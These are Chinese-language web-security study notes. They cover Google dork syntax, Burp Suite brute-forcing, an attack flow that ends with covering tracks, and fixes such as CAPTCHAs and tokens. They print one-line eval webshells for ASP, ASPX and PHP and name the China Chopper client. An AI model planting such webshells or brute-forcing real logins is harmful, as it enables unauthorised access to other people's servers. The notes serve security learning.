多应用+插件架构,代码干净,二开方便,首家独创一键云编译技术,文档视频完善,免费商用码云13.8K 广告
[TOC] ### **常见web安全漏洞** `sql`注入 ### **黑客攻击思路简图** - 信息收集 攻击测试 提升权限 扩大成果 清除痕迹 ### **渗透测试思路简图** - 信息收集 攻击测试 ### **暴力破解等介绍** **google黑语法** - `inurl`: 搜索url网址中包含的指定字符串 在搜索引擎的搜索框里输入 ``` $ inurl:login:php ``` - `intitle`: 搜索网页中的标题名中是否包含指定字 ``` $ intitle:登录 ``` - `intext`:搜索网页正文内容中的指定字符 ``` intext:登录 ``` **Burpsuite常用功能** - 拦截 ``` > intercept ``` - 抓包 - 改包 -- 暴力破解 ``` intruder ``` - 重放 - 不同验证码的讲解 ![](https://i.loli.net/2019/07/25/5d38e66d34c2331239.png) **后台暴力破解** - 存在暴力破解的特点 登录数据包不存在`验证码`、`token`等`一次性验证` ***** ### **常见漏洞的介绍** #### **一句话木马** ``` asp: <%eval request("pass")%> aspx:<%@Page Language%><%eval(Request.Item["pass"]." unsafe")%> php: < ?php @eval($_POST['pass']; )?> ``` `MIME` 多用途互联网邮件扩展类型 - 常见的MIME有哪些类型 ![](https://i.loli.net/2019/07/25/5d38ebafd444818792.png) #### **工具** `中国菜刀` ***** ### **漏洞补丁的补写** 1. 防止暴力破解修复方案 - 添加验证码 - 添加token 2. 防止上传暴力破解方案